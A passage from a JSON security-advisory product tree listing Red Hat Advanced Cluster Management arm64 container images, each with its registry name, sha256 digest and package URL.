"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-cluster-permission-rhel9@sha256%3Addb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775441299"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"product_id": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"product_identification_helper": {
"purl": "pkg:oci/config-policy-controller-rhel9@sha256%3A7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915248"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"product_id": "registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/console-rhel9@sha256%3Aa673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775116130"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"product_id": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"product_identification_helper": {
"purl": "pkg:oci/endpoint-monitoring-rhel9-operator@sha256%3Aef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915416"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-addon-controller-rhel9@sha256%3Ae126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915330"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-framework-addon-rhel9@sha256%3Aa8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915336"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"product_id": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"product_identification_helper": {
"purl": "pkg:oci/governance-policy-propagator-rhel9@sha256%3A38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915333"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-grafana-rhel9@sha256%3Ad7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774950654"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"product_id": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-dashboard-loader-rhel9@sha256%3Aa5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915373"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"product_id": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/insights-client-rhel9@sha256%3A4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915432"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"product_id": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/insights-metrics-rhel9@sha256%3A6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915327"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"product_id": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"product_identification_helper": {
"purl": "pkg:oci/klusterlet-addon-controller-rhel9@sha256%3Ad130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915355"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"product_id": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-rhel9@sha256%3A3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775630574"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"product_id": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kube-state-metrics-rhel9@sha256%3Ab10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915418"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"product_id": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/memcached-exporter-rhel9@sha256%3Ae73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775466899"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"product_id": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-collector-rhel9@sha256%3A9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915508"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"product_id": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-integrations-rhel9@sha256%3Affb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775326442"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-multicluster-observability-addon-rhel9@sha256%3A5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915504"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"product_id": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-observability-rhel9-operator@sha256%3Aedc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915540"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-application-rhel9@sha256%3A231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915538"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-channel-rhel9@sha256%3A1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775585006"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-subscription-rhel9@sha256%3A903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775176904"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"product_id": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multiclusterhub-rhel9@sha256%3A61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915533"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-must-gather-rhel9@sha256%3Aa31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775077876"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"product_id": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/node-exporter-rhel9@sha256%3A753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915524"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9@sha256%3A2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915522"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9-operator@sha256%3A0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775281134"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"product_id": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-rhel9@sha256%3Ab3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915610"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"product_id": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-alertmanager-rhel9@sha256%3Afbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915598"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-config-reloader-rhel9@sha256%3Aa8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915573"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-rhel9@sha256%3A4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915621"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"product_id": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"product_identification_helper": {
"purl": "pkg:oci/rbac-query-proxy-rhel9@sha256%3Ae8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915649"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"product_id": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/search-collector-rhel9@sha256%3Acf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1775566178"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-indexer-rhel9@sha256%3Ae9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915641"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-api-rhel9@sha256%3A7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915647"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-rhel9@sha256%3A78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774915649"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
